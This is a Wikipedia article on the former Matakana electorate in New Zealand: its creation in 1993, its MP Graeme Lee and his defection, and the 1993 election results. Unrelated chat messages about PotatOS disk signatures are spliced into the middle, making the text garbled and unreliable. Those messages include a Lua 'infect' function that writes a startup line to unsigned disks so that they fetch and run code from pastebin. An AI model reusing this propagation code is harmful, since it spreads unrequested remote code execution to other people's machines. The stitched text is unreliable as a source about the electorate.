Matakana (New Zealand electorate)

Matakana is a former New Zealand parliamentary electorate in the Thames-Coromandel District, which existed for one parliamentary term from 1993 to 1996, and was held by Graeme Lee. In 1994, Lee defected from the National Party to the Christian Democrat Party.

Population centres

Based on the 1991 New Zealand census, an electoral redistribution was carried out. This resulted in the abolition of nine electorates, and the creation of eleven new electorates. Through an amendment in the Electoral Act in 1965, the number of electorates in the South Island was fixed at 25, so the new electorates increased the number of the North Island electorates by two.[1] In the South Island, one electorate was abolished and one electorate was recreated. In the North Island, five electorates were newly created (including Matakana), five electorates were recreated, and eight electorates were abolished.[1][2]

The electorate was located adjacent to the Bay of Plenty on the east coast of the North Island, north of Tauranga and south of the Coromandel Peninsula. It is named after Matakana Island. Polling booths where more than 1,000 votes were cast were located in Katikati, Paeroa, Waihi, Waihi Beach, and Whangamata.[2] In 1996, parts of the Matakana and Hauraki electorates were taken to form the Coromandel electorate.[3]

History

This electorate was formed for the 44th session of the New Zealand Parliament in 1993. It existed for one term until 1996, and was represented by Graeme Lee of the National Party. Lee had first been elected to parliament in 1981 in the Hauraki electorate, and from 1987 to 1993, he had represented the Coromandel electorate. In 1994, Lee defected to the Christian Democrat Party. In the 1996 election, Lee stood as a list-only candidate, but as the Christian Democrats failed to make the 5% threshold, he did not re-enter parliament.

Members of Parliament

Key

 National    Christian Democrats  

Election Winner
1993 election Graeme Lee

Election results

1993 election

1993 general election: Matakana[2]
Party Candidate Votes % ±
National Graeme Lee 6,334 33.47
Alliance John Neill 5,441 28.75
NZ First John Jefferson 3,419 18.07
Labour Colin Hutchinson 3,180 16.80
Christian Heritage Marian Clarke 240 1.27
McGillicuddy Serious Brent Soper 172 0.91
Natural Law Lynne Lee 140 0.74
Majority 893 4.72
Informal votes 418 2.16
Turnout 19,344 85.34
Registered electors 22,666

Further reading

  • Lee, Graeme (2002). Faith, Politics and Servant Leadership. Auckland: Castle. ISBN 0-9582124-9-X.CS1 maint: ref=harv (link)
gollark: The signatures are programatically generated from the contents of the file and my private key. PotatOS has the *public* key, so it can verify that the signature was generated from the corresponding private key.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?

References

  1. McRobie, Alan (1989). Electoral Atlas of New Zealand. Wellington: GP Books. pp. 111f. ISBN 0-477-01384-8.CS1 maint: ref=harv (link)
  2. Part 1: Votes recorded at each polling place (Technical report). New Zealand Chief Electoral Office. 1993. pp. 62, 162.
  3. "Electorate Profile Coromandel" (PDF). Parliamentary Library. October 2005. p. 3. Archived from the original (PDF) on 23 February 2013. Retrieved 26 June 2015.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.